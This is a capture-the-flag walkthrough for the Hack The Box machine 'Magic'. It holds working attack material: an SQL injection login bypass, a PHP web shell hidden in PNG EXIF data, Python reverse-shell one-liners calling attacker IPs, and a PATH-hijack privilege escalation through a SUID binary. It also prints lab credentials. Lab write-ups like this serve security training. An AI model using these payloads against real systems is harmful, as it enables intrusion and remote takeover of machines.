MAGIC — HACK THE BOX walkthrough

In this writeup , i am gonna explain how i rooted the box magic with IP address 10.10.10.185 and the difficulty assigned is medium level

see the left corner of this image

the image shows the please login to upload images , i made up mind to look for bypass login and then looking for paswords

Recon Results:

nmap results revealed that the ports 80 and 22 are open and the port 80 runs in apache server and the port 22 with openssh enabled

Login page

i tried login with default creds like admin:admin admin:pass etc.. like that but failed so what next i had thought of trying sql injection authentication bypass

so i bypassed login page with simple sql payloads username: ‘ OR 1=1 — password: ‘ OR 1=1 —

after bypassing login page , i am able to upload images

the above article will be usefull for bypassing file upload restrictions , i tried uploading .php files with content type image but they whiltelisted with jpg and png type files.

i can be bypassed with double extension like “image.php.png”

i used exif tool to embed payload in png image file

exiftool -Comment='<?php system($_REQUEST['cmd']); ?>' magic.png

UPLOADING PHP SHELL:

so uploaded a shell and this file can be accesed at path http://10.10.10.185/images/uploads/image.php.png

So final URL to execute command becomes http://10.10.10.185/images/uploads/image.php.png? cmd=OS_command_here

executing id command
etc/passwd

So , now we got rce , now its time to get a remote shell

i used this python shell which i get from pentester monkey

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.168"1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

now start a netcat listener at port 1234

nc -nlvp 1234

established connection to magic hackthebox

upgrade your shell

python3 -c ‘import pty;pty.spawn("/bin/bash")’

export TERM=xterm-256color

upgrading shell

i already got one user ‘thesues’ from etc/pass after simple manual enumeration i got a file named “db.php5” at path /var/www/magic

credentials from sql db

then i got credentials of the user dbUsername: thesues dbuserpassword: iamkingthesues

Getting user flag:

Privilege escalation:

here our user thesues have given root privelege to run the command called sysinfo

Let’s know something about sysinfo command. When sysinfo command is executed it calls four other commands to print h/w info, disk info, CPU info and memory usage info. Among these command $fdisk command requires root privilege to get executed. Since sysinfo is a custom SUID binary owned by root so, whenever it is executed by theseus, theseus is given root privilege to execute this command.

our privilege escalation vector may be SUID binary exploitation.

creating fdisk file with our python shell

echo python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.209",4442));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > fdisk
wget 10.10.14.168/fdisk //to download this file into remote shell

add this fdisk file to the /tmp directory and give permission

‘chmod 755 fdisk’ to run

then i started a netcat listner at port 2234 and after executing sysinfo magic happened and i got root access

rooted magic.